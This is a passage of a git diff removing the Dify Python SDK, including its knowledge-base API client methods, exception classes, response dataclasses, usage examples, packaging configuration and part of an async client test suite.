Delete this dataset. - - :return: Response from the API - """ - url = f"/datasets/{self._get_dataset_id()}" - return self._send_request("DELETE", url) - - def delete_document(self, document_id: str): - """ - Delete a document. - - :param document_id: ID of the document - :return: Response from the API - """ - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}" - return self._send_request("DELETE", url) - - def list_documents( - self, - page: int | None = None, - page_size: int | None = None, - keyword: str | None = None, - **kwargs, - ): - """ - Get a list of documents in this dataset. - - :return: Response from the API - """ - params = {} - if page is not None: - params["page"] = page - if page_size is not None: - params["limit"] = page_size - if keyword is not None: - params["keyword"] = keyword - url = f"/datasets/{self._get_dataset_id()}/documents" - return self._send_request("GET", url, params=params, **kwargs) - - def add_segments(self, document_id: str, segments: list[dict], **kwargs): - """ - Add segments to a document. - - :param document_id: ID of the document - :param segments: List of segments to add, example: [{"content": "1", "answer": "1", "keyword": ["a"]}] - :return: Response from the API - """ - data = {"segments": segments} - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments" - return self._send_request("POST", url, json=data, **kwargs) - - def query_segments( - self, - document_id: str, - keyword: str | None = None, - status: str | None = None, - **kwargs, - ): - """ - Query segments in this document. - - :param document_id: ID of the document - :param keyword: query keyword, optional - :param status: status of the segment, optional, e.g. completed - :param kwargs: Additional parameters to pass to the API. - Can include a 'params' dict for extra query parameters. - """ - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments" - params = {} - if keyword is not None: - params["keyword"] = keyword - if status is not None: - params["status"] = status - if "params" in kwargs: - params.update(kwargs.pop("params")) - return self._send_request("GET", url, params=params, **kwargs) - - def delete_document_segment(self, document_id: str, segment_id: str): - """ - Delete a segment from a document. - - :param document_id: ID of the document - :param segment_id: ID of the segment - :return: Response from the API - """ - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments/{segment_id}" - return self._send_request("DELETE", url) - - def update_document_segment(self, document_id: str, segment_id: str, segment_data: dict, **kwargs): - """ - Update a segment in a document. - - :param document_id: ID of the document - :param segment_id: ID of the segment - :param segment_data: Data of the segment, example: {"content": "1", "answer": "1", "keyword": ["a"], "enabled": True} - :return: Response from the API - """ - data = {"segment": segment_data} - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments/{segment_id}" - return self._send_request("POST", url, json=data, **kwargs) - - # Advanced Knowledge Base APIs - def hit_testing( - self, - query: str, - retrieval_model: Dict[str, Any] = None, - external_retrieval_model: Dict[str, Any] = None, - ): - """Perform hit testing on the dataset.""" - data = {"query": query} - if retrieval_model: - data["retrieval_model"] = retrieval_model - if external_retrieval_model: - data["external_retrieval_model"] = external_retrieval_model - url = f"/datasets/{self._get_dataset_id()}/hit-testing" - return self._send_request("POST", url, json=data) - - def get_dataset_metadata(self): - """Get dataset metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata" - return self._send_request("GET", url) - - def create_dataset_metadata(self, metadata_data: Dict[str, Any]): - """Create dataset metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata" - return self._send_request("POST", url, json=metadata_data) - - def update_dataset_metadata(self, metadata_id: str, metadata_data: Dict[str, Any]): - """Update dataset metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata/{metadata_id}" - return self._send_request("PATCH", url, json=metadata_data) - - def get_built_in_metadata(self): - """Get built-in metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata/built-in" - return self._send_request("GET", url) - - def manage_built_in_metadata(self, action: str, metadata_data: Dict[str, Any] = None): - """Manage built-in metadata with specified action.""" - data = metadata_data or {} - url = f"/datasets/{self._get_dataset_id()}/metadata/built-in/{action}" - return self._send_request("POST", url, json=data) - - def update_documents_metadata(self, operation_data: List[Dict[str, Any]]): - """Update metadata for multiple documents.""" - url = f"/datasets/{self._get_dataset_id()}/documents/metadata" - data = {"operation_data": operation_data} - return self._send_request("POST", url, json=data) - - # Dataset Tags APIs - def list_dataset_tags(self): - """List all dataset tags.""" - return self._send_request("GET", "/datasets/tags") - - def bind_dataset_tags(self, tag_ids: List[str]): - """Bind tags to dataset.""" - data = {"tag_ids": tag_ids, "target_id": self._get_dataset_id()} - return self._send_request("POST", "/datasets/tags/binding", json=data) - - def unbind_dataset_tag(self, tag_id: str): - """Unbind a single tag from dataset.""" - data = {"tag_id": tag_id, "target_id": self._get_dataset_id()} - return self._send_request("POST", "/datasets/tags/unbinding", json=data) - - def get_dataset_tags(self): - """Get tags for current dataset.""" - url = f"/datasets/{self._get_dataset_id()}/tags" - return self._send_request("GET", url) - - # RAG Pipeline APIs - def get_datasource_plugins(self, is_published: bool = True): - """Get datasource plugins for RAG pipeline.""" - params = {"is_published": is_published} - url = f"/datasets/{self._get_dataset_id()}/pipeline/datasource-plugins" - return self._send_request("GET", url, params=params) - - def run_datasource_node( - self, - node_id: str, - inputs: Dict[str, Any], - datasource_type: str, - is_published: bool = True, - credential_id: str = None, - ): - """Run a datasource node in RAG pipeline.""" - data = { - "inputs": inputs, - "datasource_type": datasource_type, - "is_published": is_published, - } - if credential_id: - data["credential_id"] = credential_id - url = f"/datasets/{self._get_dataset_id()}/pipeline/datasource/nodes/{node_id}/run" - return self._send_request("POST", url, json=data, stream=True) - - def run_rag_pipeline( - self, - inputs: Dict[str, Any], - datasource_type: str, - datasource_info_list: List[Dict[str, Any]], - start_node_id: str, - is_published: bool = True, - response_mode: Literal["streaming", "blocking"] = "blocking", - ): - """Run RAG pipeline.""" - data = { - "inputs": inputs, - "datasource_type": datasource_type, - "datasource_info_list": datasource_info_list, - "start_node_id": start_node_id, - "is_published": is_published, - "response_mode": response_mode, - } - url = f"/datasets/{self._get_dataset_id()}/pipeline/run" - return self._send_request("POST", url, json=data, stream=response_mode == "streaming") - - def upload_pipeline_file(self, file_path: str): - """Upload file for RAG pipeline.""" - with open(file_path, "rb") as f: - files = {"file": (os.path.basename(file_path), f)} - return self._send_request_with_files("POST", "/datasets/pipeline/file-upload", {}, files) - - # Dataset Management APIs - def get_dataset(self, dataset_id: str | None = None): - """Get detailed information about a specific dataset. - - Args: - dataset_id: Dataset ID (optional, uses current dataset_id if not provided) - - Returns: - Response from the API containing dataset details including: - - name, description, permission - - indexing_technique, embedding_model, embedding_model_provider - - retrieval_model configuration - - document_count, word_count, app_count - - created_at, updated_at - """ - ds_id = dataset_id or self._get_dataset_id() - url = f"/datasets/{ds_id}" - return self._send_request("GET", url) - - def update_dataset( - self, - dataset_id: str | None = None, - name: str | None = None, - description: str | None = None, - indexing_technique: str | None = None, - embedding_model: str | None = None, - embedding_model_provider: str | None = None, - retrieval_model: Dict[str, Any] | None = None, - **kwargs, - ): - """Update dataset configuration. - - Args: - dataset_id: Dataset ID (optional, uses current dataset_id if not provided) - name: New dataset name - description: New dataset description - indexing_technique: Indexing technique ('high_quality' or 'economy') - embedding_model: Embedding model name - embedding_model_provider: Embedding model provider - retrieval_model: Retrieval model configuration dict - **kwargs: Additional parameters to pass to the API - - Returns: - Response from the API with updated dataset information - """ - ds_id = dataset_id or self._get_dataset_id() - url = f"/datasets/{ds_id}" - - # Build data dictionary with all possible parameters - payload = { - "name": name, - "description": description, - "indexing_technique": indexing_technique, - "embedding_model": embedding_model, - "embedding_model_provider": embedding_model_provider, - "retrieval_model": retrieval_model, - } - - # Filter out None values and merge with additional kwargs - data = {k: v for k, v in payload.items() if v is not None} - data.update(kwargs) - - return self._send_request("PATCH", url, json=data) - - def batch_update_document_status( - self, - action: Literal["enable", "disable", "archive", "un_archive"], - document_ids: List[str], - dataset_id: str | None = None, - ): - """Batch update document status (enable/disable/archive/unarchive). - - Args: - action: Action to perform on documents - - 'enable': Enable documents for retrieval - - 'disable': Disable documents from retrieval - - 'archive': Archive documents - - 'un_archive': Unarchive documents - document_ids: List of document IDs to update - dataset_id: Dataset ID (optional, uses current dataset_id if not provided) - - Returns: - Response from the API with operation result - """ - ds_id = dataset_id or self._get_dataset_id() - url = f"/datasets/{ds_id}/documents/status/{action}" - data = {"document_ids": document_ids} - return self._send_request("PATCH", url, json=data) - - # Enhanced Dataset APIs - def create_dataset_from_template(self, template_name: str, name: str, description: str | None = None): - """Create a dataset from a predefined template. - - Args: - template_name: Name of the template to use - name: Name for the new dataset - description: Description for the dataset (optional) - - Returns: - Created dataset information - """ - data = { - "template_name": template_name, - "name": name, - "description": description, - } - return self._send_request("POST", "/datasets/from-template", json=data) - - def duplicate_dataset(self, dataset_id: str, name: str): - """Duplicate an existing dataset. - - Args: - dataset_id: ID of dataset to duplicate - name: Name for duplicated dataset - - Returns: - New dataset information - """ - data = {"name": name} - url = f"/datasets/{dataset_id}/duplicate" - return self._send_request("POST", url, json=data) - - def list_conversation_variables_with_pagination( - self, conversation_id: str, user: str, page: int = 1, limit: int = 20 - ): - """List conversation variables with pagination.""" - params = {"page": page, "limit": limit, "user": user} - url = f"/conversations/{conversation_id}/variables" - return self._send_request("GET", url, params=params) - - def update_conversation_variable_with_response(self, conversation_id: str, variable_id: str, user: str, value: Any): - """Update a conversation variable with full response handling.""" - data = {"value": value, "user": user} - url = f"/conversations/{conversation_id}/variables/{variable_id}" - return self._send_request("PUT", url, json=data) diff --git a/sdks/python-client/dify_client/exceptions.py b/sdks/python-client/dify_client/exceptions.py deleted file mode 100644 index e7ba2ff4b2..0000000000 --- a/sdks/python-client/dify_client/exceptions.py +++ /dev/null @@ -1,71 +0,0 @@ -"""Custom exceptions for the Dify client.""" - -from typing import Optional, Dict, Any - - -class DifyClientError(Exception): - """Base exception for all Dify client errors.""" - - def __init__(self, message: str, status_code: int | None = None, response: Dict[str, Any] | None = None): - super().__init__(message) - self.message = message - self.status_code = status_code - self.response = response - - -class APIError(DifyClientError): - """Raised when the API returns an error response.""" - - def __init__(self, message: str, status_code: int, response: Dict[str, Any] | None = None): - super().__init__(message, status_code, response) - self.status_code = status_code - - -class AuthenticationError(DifyClientError): - """Raised when authentication fails.""" - - pass - - -class RateLimitError(DifyClientError): - """Raised when rate limit is exceeded.""" - - def __init__(self, message: str = "Rate limit exceeded", retry_after: int | None = None): - super().__init__(message) - self.retry_after = retry_after - - -class ValidationError(DifyClientError): - """Raised when request validation fails.""" - - pass - - -class NetworkError(DifyClientError): - """Raised when network-related errors occur.""" - - pass - - -class TimeoutError(DifyClientError): - """Raised when request times out.""" - - pass - - -class FileUploadError(DifyClientError): - """Raised when file upload fails.""" - - pass - - -class DatasetError(DifyClientError): - """Raised when dataset operations fail.""" - - pass - - -class WorkflowError(DifyClientError): - """Raised when workflow operations fail.""" - - pass diff --git a/sdks/python-client/dify_client/models.py b/sdks/python-client/dify_client/models.py deleted file mode 100644 index 0321e9c3f4..0000000000 --- a/sdks/python-client/dify_client/models.py +++ /dev/null @@ -1,396 +0,0 @@ -"""Response models for the Dify client with proper type hints.""" - -from typing import Optional, List, Dict, Any, Literal, Union -from dataclasses import dataclass, field -from datetime import datetime - - -@dataclass -class BaseResponse: - """Base response model.""" - - success: bool = True - message: str | None = None - - -@dataclass -class ErrorResponse(BaseResponse): - """Error response model.""" - - error_code: str | None = None - details: Dict[str, Any] | None = None - success: bool = False - - -@dataclass -class FileInfo: - """File information model.""" - - id: str - name: str - size: int - mime_type: str - url: str | None = None - created_at: datetime | None = None - - -@dataclass -class MessageResponse(BaseResponse): - """Message response model.""" - - id: str = "" - answer: str = "" - conversation_id: str | None = None - created_at: int | None = None - metadata: Dict[str, Any] | None = None - files: List[Dict[str, Any]] | None = None - - -@dataclass -class ConversationResponse(BaseResponse): - """Conversation response model.""" - - id: str = "" - name: str = "" - inputs: Dict[str, Any] | None = None - status: str | None = None - created_at: int | None = None - updated_at: int | None = None - - -@dataclass -class DatasetResponse(BaseResponse): - """Dataset response model.""" - - id: str = "" - name: str = "" - description: str | None = None - permission: str | None = None - indexing_technique: str | None = None - embedding_model: str | None = None - embedding_model_provider: str | None = None - retrieval_model: Dict[str, Any] | None = None - document_count: int | None = None - word_count: int | None = None - app_count: int | None = None - created_at: int | None = None - updated_at: int | None = None - - -@dataclass -class DocumentResponse(BaseResponse): - """Document response model.""" - - id: str = "" - name: str = "" - data_source_type: str | None = None - data_source_info: Dict[str, Any] | None = None - dataset_process_rule_id: str | None = None - batch: str | None = None - position: int | None = None - enabled: bool | None = None - disabled_at: float | None = None - disabled_by: str | None = None - archived: bool | None = None - archived_reason: str | None = None - archived_at: float | None = None - archived_by: str | None = None - word_count: int | None = None - hit_count: int | None = None - doc_form: str | None = None - doc_metadata: Dict[str, Any] | None = None - created_at: float | None = None - updated_at: float | None = None - indexing_status: str | None = None - completed_at: float | None = None - paused_at: float | None = None - error: str | None = None - stopped_at: float | None = None - - -@dataclass -class DocumentSegmentResponse(BaseResponse): - """Document segment response model.""" - - id: str = "" - position: int | None = None - document_id: str | None = None - content: str | None = None - answer: str | None = None - word_count: int | None = None - tokens: int | None = None - keywords: List[str] | None = None - index_node_id: str | None = None - index_node_hash: str | None = None - hit_count: int | None = None - enabled: bool | None = None - disabled_at: float | None = None - disabled_by: str | None = None - status: str | None = None - created_by: str | None = None - created_at: float | None = None - indexing_at: float | None = None - completed_at: float | None = None - error: str | None = None - stopped_at: float | None = None - - -@dataclass -class WorkflowRunResponse(BaseResponse): - """Workflow run response model.""" - - id: str = "" - workflow_id: str | None = None - status: Literal["running", "succeeded", "failed", "stopped"] | None = None - inputs: Dict[str, Any] | None = None - outputs: Dict[str, Any] | None = None - error: str | None = None - elapsed_time: float | None = None - total_tokens: int | None = None - total_steps: int | None = None - created_at: float | None = None - finished_at: float | None = None - - -@dataclass -class ApplicationParametersResponse(BaseResponse): - """Application parameters response model.""" - - opening_statement: str | None = None - suggested_questions: List[str] | None = None - speech_to_text: Dict[str, Any] | None = None - text_to_speech: Dict[str, Any] | None = None - retriever_resource: Dict[str, Any] | None = None - sensitive_word_avoidance: Dict[str, Any] | None = None - file_upload: Dict[str, Any] | None = None - system_parameters: Dict[str, Any] | None = None - user_input_form: List[Dict[str, Any]] | None = None - - -@dataclass -class AnnotationResponse(BaseResponse): - """Annotation response model.""" - - id: str = "" - question: str = "" - answer: str = "" - content: str | None = None - created_at: float | None = None - updated_at: float | None = None - created_by: str | None = None - updated_by: str | None = None - hit_count: int | None = None - - -@dataclass -class PaginatedResponse(BaseResponse): - """Paginated response model.""" - - data: List[Any] = field(default_factory=list) - has_more: bool = False - limit: int = 0 - total: int = 0 - page: int | None = None - - -@dataclass -class ConversationVariableResponse(BaseResponse): - """Conversation variable response model.""" - - conversation_id: str = "" - variables: List[Dict[str, Any]] = field(default_factory=list) - - -@dataclass -class FileUploadResponse(BaseResponse): - """File upload response model.""" - - id: str = "" - name: str = "" - size: int = 0 - mime_type: str = "" - url: str | None = None - created_at: float | None = None - - -@dataclass -class AudioResponse(BaseResponse): - """Audio generation/response model.""" - - audio: str | None = None # Base64 encoded audio data or URL - audio_url: str | None = None - duration: float | None = None - sample_rate: int | None = None - - -@dataclass -class SuggestedQuestionsResponse(BaseResponse): - """Suggested questions response model.""" - - message_id: str = "" - questions: List[str] = field(default_factory=list) - - -@dataclass -class AppInfoResponse(BaseResponse): - """App info response model.""" - - id: str = "" - name: str = "" - description: str | None = None - icon: str | None = None - icon_background: str | None = None - mode: str | None = None - tags: List[str] | None = None - enable_site: bool | None = None - enable_api: bool | None = None - api_token: str | None = None - - -@dataclass -class WorkspaceModelsResponse(BaseResponse): - """Workspace models response model.""" - - models: List[Dict[str, Any]] = field(default_factory=list) - - -@dataclass -class HitTestingResponse(BaseResponse): - """Hit testing response model.""" - - query: str = "" - records: List[Dict[str, Any]] = field(default_factory=list) - - -@dataclass -class DatasetTagsResponse(BaseResponse): - """Dataset tags response model.""" - - tags: List[Dict[str, Any]] = field(default_factory=list) - - -@dataclass -class WorkflowLogsResponse(BaseResponse): - """Workflow logs response model.""" - - logs: List[Dict[str, Any]] = field(default_factory=list) - total: int = 0 - page: int = 0 - limit: int = 0 - has_more: bool = False - - -@dataclass -class ModelProviderResponse(BaseResponse): - """Model provider response model.""" - - provider_name: str = "" - provider_type: str = "" - models: List[Dict[str, Any]] = field(default_factory=list) - is_enabled: bool = False - credentials: Dict[str, Any] | None = None - - -@dataclass -class FileInfoResponse(BaseResponse): - """File info response model.""" - - id: str = "" - name: str = "" - size: int = 0 - mime_type: str = "" - url: str | None = None - created_at: int | None = None - metadata: Dict[str, Any] | None = None - - -@dataclass -class WorkflowDraftResponse(BaseResponse): - """Workflow draft response model.""" - - id: str = "" - app_id: str = "" - draft_data: Dict[str, Any] = field(default_factory=dict) - version: int = 0 - created_at: int | None = None - updated_at: int | None = None - - -@dataclass -class ApiTokenResponse(BaseResponse): - """API token response model.""" - - id: str = "" - name: str = "" - token: str = "" - description: str | None = None - created_at: int | None = None - last_used_at: int | None = None - is_active: bool = True - - -@dataclass -class JobStatusResponse(BaseResponse): - """Job status response model.""" - - job_id: str = "" - job_status: str = "" - error_msg: str | None = None - progress: float | None = None - created_at: int | None = None - updated_at: int | None = None - - -@dataclass -class DatasetQueryResponse(BaseResponse): - """Dataset query response model.""" - - query: str = "" - records: List[Dict[str, Any]] = field(default_factory=list) - total: int = 0 - search_time: float | None = None - retrieval_model: Dict[str, Any] | None = None - - -@dataclass -class DatasetTemplateResponse(BaseResponse): - """Dataset template response model.""" - - template_name: str = "" - display_name: str = "" - description: str = "" - category: str = "" - icon: str | None = None - config_schema: Dict[str, Any] = field(default_factory=dict) - - -# Type aliases for common response types -ResponseType = Union[ - BaseResponse, - ErrorResponse, - MessageResponse, - ConversationResponse, - DatasetResponse, - DocumentResponse, - DocumentSegmentResponse, - WorkflowRunResponse, - ApplicationParametersResponse, - AnnotationResponse, - PaginatedResponse, - ConversationVariableResponse, - FileUploadResponse, - AudioResponse, - SuggestedQuestionsResponse, - AppInfoResponse, - WorkspaceModelsResponse, - HitTestingResponse, - DatasetTagsResponse, - WorkflowLogsResponse, - ModelProviderResponse, - FileInfoResponse, - WorkflowDraftResponse, - ApiTokenResponse, - JobStatusResponse, - DatasetQueryResponse, - DatasetTemplateResponse, -] diff --git a/sdks/python-client/examples/advanced_usage.py b/sdks/python-client/examples/advanced_usage.py deleted file mode 100644 index bc8720bef2..0000000000 --- a/sdks/python-client/examples/advanced_usage.py +++ /dev/null @@ -1,264 +0,0 @@ -""" -Advanced usage examples for the Dify Python SDK. - -This example demonstrates: -- Error handling and retries -- Logging configuration -- Context managers -- Async usage -- File uploads -- Dataset management -""" - -import asyncio -import logging -from pathlib import Path - -from dify_client import ( - ChatClient, - CompletionClient, - AsyncChatClient, - KnowledgeBaseClient, - DifyClient, -) -from dify_client.exceptions import ( - APIError, - RateLimitError, - AuthenticationError, - DifyClientError, -) - - -def setup_logging(): - """Setup logging for the SDK.""" - logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(name)s - %(levelname)s - %(message)s") - - -def example_chat_with_error_handling(): - """Example of chat with comprehensive error handling.""" - api_key = "your-api-key-here" - - try: - with ChatClient(api_key, enable_logging=True) as client: - # Simple chat message - response = client.create_chat_message( - inputs={}, query="Hello, how are you?", user="user-123", response_mode="blocking" - ) - - result = response.json() - print(f"Response: {result.get('answer')}") - - except AuthenticationError as e: - print(f"Authentication failed: {e}") - print("Please check your API key") - - except RateLimitError as e: - print(f"Rate limit exceeded: {e}") - if e.retry_after: - print(f"Retry after {e.retry_after} seconds") - - except APIError as e: - print(f"API error: {e.message}") - print(f"Status code: {e.status_code}") - - except DifyClientError as e: - print(f"Dify client error: {e}") - - except Exception as e: - print(f"Unexpected error: {e}") - - -def example_completion_with_files(): - """Example of completion with file upload.""" - api_key = "your-api-key-here" - - with CompletionClient(api_key) as client: - # Upload an image file first - file_path = "path/to/your/image.jpg" - - try: - with open(file_path, "rb") as f: - files = {"file": (Path(file_path).name, f, "image/jpeg")} - upload_response = client.file_upload("user-123", files) - upload_response.raise_for_status() - - file_id = upload_response.json().get("id") - print(f"File uploaded with ID: {file_id}") - - # Use the uploaded file in completion - files_list = [{"type": "image", "transfer_method": "local_file", "upload_file_id": file_id}] - - completion_response = client.create_completion_message( - inputs={"query": "Describe this image"}, response_mode="blocking", user="user-123", files=files_list - ) - - result = completion_response.json() - print(f"Completion result: {result.get('answer')}") - - except FileNotFoundError: - print(f"File not found: {file_path}") - except Exception as e: - print(f"Error during file upload/completion: {e}") - - -def example_dataset_management(): - """Example of dataset management operations.""" - api_key = "your-api-key-here" - - with KnowledgeBaseClient(api_key) as kb_client: - try: - # Create a new dataset - create_response = kb_client.create_dataset(name="My Test Dataset") - create_response.raise_for_status() - - dataset_id = create_response.json().get("id") - print(f"Created dataset with ID: {dataset_id}") - - # Create a client with the dataset ID - dataset_client = KnowledgeBaseClient(api_key, dataset_id=dataset_id) - - # Add a document by text - doc_response = dataset_client.create_document_by_text( - name="Test Document", text="This is a test document for the knowledge base." - ) - doc_response.raise_for_status() - - document_id = doc_response.json().get("document", {}).get("id") - print(f"Created document with ID: {document_id}") - - # List documents - list_response = dataset_client.list_documents() - list_response.raise_for_status() - - documents = list_response.json().get("data", []) - print(f"Dataset contains {len(documents)} documents") - - # Update dataset configuration - update_response = dataset_client.update_dataset( - name="Updated Dataset Name", description="Updated description", indexing_technique="high_quality" - ) - update_response.raise_for_status() - - print("Dataset updated successfully") - - except Exception as e: - print(f"Dataset management error: {e}") - - -async def example_async_chat(): - """Example of async chat usage.""" - api_key = "your-api-key-here" - - try: - async with AsyncChatClient(api_key) as client: - # Create chat message - response = await client.create_chat_message( - inputs={}, query="What's the weather like?", user="user-456", response_mode="blocking" - ) - - result = response.json() - print(f"Async response: {result.get('answer')}") - - # Get conversations - conversations = await client.get_conversations("user-456") - conversations.raise_for_status() - - conv_data = conversations.json() - print(f"Found {len(conv_data.get('data', []))} conversations") - - except Exception as e: - print(f"Async chat error: {e}") - - -def example_streaming_response(): - """Example of handling streaming responses.""" - api_key = "your-api-key-here" - - with ChatClient(api_key) as client: - try: - response = client.create_chat_message( - inputs={}, query="Tell me a story", user="user-789", response_mode="streaming" - ) - - print("Streaming response:") - for line in response.iter_lines(decode_unicode=True): - if line.startswith("data:"): - data = line[5:].strip() - if data: - import json - - try: - chunk = json.loads(data) - answer = chunk.get("answer", "") - if answer: - print(answer, end="", flush=True) - except json.JSONDecodeError: - continue - print() # New line after streaming - - except Exception as e: - print(f"Streaming error: {e}") - - -def example_application_info(): - """Example of getting application information.""" - api_key = "your-api-key-here" - - with DifyClient(api_key) as client: - try: - # Get app info - info_response = client.get_app_info() - info_response.raise_for_status() - - app_info = info_response.json() - print(f"App name: {app_info.get('name')}") - print(f"App mode: {app_info.get('mode')}") - print(f"App tags: {app_info.get('tags', [])}") - - # Get app parameters - params_response = client.get_application_parameters("user-123") - params_response.raise_for_status() - - params = params_response.json() - print(f"Opening statement: {params.get('opening_statement')}") - print(f"Suggested questions: {params.get('suggested_questions', [])}") - - except Exception as e: - print(f"App info error: {e}") - - -def main(): - """Run all examples.""" - setup_logging() - - print("=== Dify Python SDK Advanced Usage Examples ===\n") - - print("1. Chat with Error Handling:") - example_chat_with_error_handling() - print() - - print("2. Completion with Files:") - example_completion_with_files() - print() - - print("3. Dataset Management:") - example_dataset_management() - print() - - print("4. Async Chat:") - asyncio.run(example_async_chat()) - print() - - print("5. Streaming Response:") - example_streaming_response() - print() - - print("6. Application Info:") - example_application_info() - print() - - print("All examples completed!") - - -if __name__ == "__main__": - main() diff --git a/sdks/python-client/pyproject.toml b/sdks/python-client/pyproject.toml deleted file mode 100644 index a25cb9150c..0000000000 --- a/sdks/python-client/pyproject.toml +++ /dev/null @@ -1,43 +0,0 @@ -[project] -name = "dify-client" -version = "0.1.12" -description = "A package for interacting with the Dify Service-API" -readme = "README.md" -requires-python = ">=3.10" -dependencies = [ - "httpx[http2]>=0.27.0", - "aiofiles>=23.0.0", -] -authors = [ - {name = "Dify", email = "hello@dify.ai"} -] -license = {text = "MIT"} -keywords = ["dify", "nlp", "ai", "language-processing"] -classifiers = [ - "Programming Language :: Python :: 3", - "License :: OSI Approved :: MIT License", - "Operating System :: OS Independent", -] - -[project.urls] -Homepage = "https://github.com/langgenius/dify" - -[project.optional-dependencies] -dev = [ - "pytest>=7.0.0", - "pytest-asyncio>=0.21.0", -] - -[build-system] -requires = ["hatchling"] -build-backend = "hatchling.build" - -[tool.hatch.build.targets.wheel] -packages = ["dify_client"] - -[tool.pytest.ini_options] -testpaths = ["tests"] -python_files = ["test_*.py"] -python_classes = ["Test*"] -python_functions = ["test_*"] -asyncio_mode = "auto" diff --git a/sdks/python-client/tests/test_async_client.py b/sdks/python-client/tests/test_async_client.py deleted file mode 100644 index 4f5001866f..0000000000 --- a/sdks/python-client/tests/test_async_client.py +++ /dev/null @@ -1,250 +0,0 @@ -#!/usr/bin/env python3 -""" -Test suite for async client implementation in the Python SDK. - -This test validates the async/await functionality using httpx.AsyncClient -and ensures API parity with sync clients. -""" - -import unittest -from unittest.mock import Mock, patch, AsyncMock - -from dify_client.async_client import ( - AsyncDifyClient, - AsyncChatClient, - AsyncCompletionClient, - AsyncWorkflowClient, - AsyncWorkspaceClient, - AsyncKnowledgeBaseClient, -) - - -class TestAsyncAPIParity(unittest.TestCase): - """Test that async clients have API parity with sync clients.""" - - def test_dify_client_api_parity(self): - """Test AsyncDifyClient has same methods as DifyClient.""" - from dify_client import DifyClient - - sync_methods = {name for name in dir(DifyClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncDifyClient) if not name.startswith("_")} - - # aclose is async-specific, close is sync-specific - sync_methods.discard("close") - async_methods.discard("aclose") - - # Verify parity - self.assertEqual(sync_methods, async_methods, "API parity mismatch for DifyClient") - - def test_chat_client_api_parity(self): - """Test AsyncChatClient has same methods as ChatClient.""" - from dify_client import ChatClient - - sync_methods = {name for name in dir(ChatClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncChatClient) if not name.startswith("_")} - - sync_methods.discard("close") - async_methods.discard("aclose") - - self.assertEqual(sync_methods, async_methods, "API parity mismatch for ChatClient") - - def test_completion_client_api_parity(self): - """Test AsyncCompletionClient has same methods as CompletionClient.""" - from dify_client import CompletionClient - - sync_methods = {name for name in dir(CompletionClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncCompletionClient) if not name.startswith("_")} - - sync_methods.discard("close") - async_methods.discard("aclose") - - self.assertEqual(sync_methods, async_methods, "API parity mismatch for CompletionClient") - - def test_workflow_client_api_parity(self): - """Test AsyncWorkflowClient has same methods as WorkflowClient.""" - from dify_client import WorkflowClient - - sync_methods = {name for name in dir(WorkflowClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncWorkflowClient) if not name.startswith("_")} - - sync_methods.discard("close") - async_methods.discard("aclose") - - self.assertEqual(sync_methods, async_methods, "API parity mismatch for WorkflowClient") - - def test_workspace_client_api_parity(self): - """Test AsyncWorkspaceClient has same methods as WorkspaceClient.""" - from dify_client import WorkspaceClient - - sync_methods = {name for name in dir(WorkspaceClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncWorkspaceClient) if not name.startswith("_")} - - sync_methods.discard("close") - async_methods.discard("aclose") - - self.assertEqual(sync_methods, async_methods, "API parity mismatch for WorkspaceClient") - - def test_knowledge_base_client_api_parity(self): - """Test AsyncKnowledgeBaseClient has same methods as KnowledgeBaseClient.""" - from dify_client import KnowledgeBaseClient - - sync_methods = {name for name in dir(KnowledgeBaseClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncKnowledgeBaseClient) if not name.startswith("_")} - - sync_methods.discard("close") - async_methods.discard("aclose") - - self.assertEqual(sync_methods, async_methods, "API parity mismatch for KnowledgeBaseClient") - - -class TestAsyncClientMocked(unittest.IsolatedAsyncioTestCase): - """Test async client with mocked httpx.AsyncClient.""" - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_client_initialization(self, mock_httpx_async_client): - """Test async client initializes with httpx.AsyncClient.""" - mock_client_instance = AsyncMock() - mock_httpx_async_client.return_value = mock_client_instance - - client = AsyncDifyClient("test-key", "https://api.dify.ai/v1") - - # Verify httpx.AsyncClient was called - mock_httpx_async_client.assert_called_once() - self.assertEqual(client.api_key, "test-key") - - await client.aclose() - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_context_manager(self, mock_httpx_async_client): - """Test async context manager works.""" - mock_client_instance = AsyncMock() - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncDifyClient("test-key") as client: - self.assertEqual(client.api_key, "test-key") - - # Verify aclose was called - mock_client_instance.aclose.assert_called_once() - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_send_request(self, mock_httpx_async_client): - """Test async _send_request method.""" - mock_response = AsyncMock() - mock_response.json = AsyncMock(return_value={"result": "success"}) - mock_response.status_code = 200 - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncDifyClient("test-key") as client: - response = await client._send_request("GET", "/test") - - # Verify request was called - mock_client_instance.request.assert_called_once() - call_args = mock_client_instance.request.call_args - - # Verify parameters - self.assertEqual(call_args[0][0], "GET") - self.assertEqual(call_args[0][1], "/test") - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_chat_client(self, mock_httpx_async_client): - """Test AsyncChatClient functionality.""" - mock_response = AsyncMock() - mock_response.text = '{"answer": "Hello!"}' - mock_response.json = AsyncMock(return_value={"answer": "Hello!"}) - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncChatClient("test-key") as client: - response = await client.create_chat_message({}, "Hi", "user123") - self.assertIn("answer", response.text) - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_completion_client(self, mock_httpx_async_client): - """Test AsyncCompletionClient functionality.""" - mock_response = AsyncMock() - mock_response.text = '{"answer": 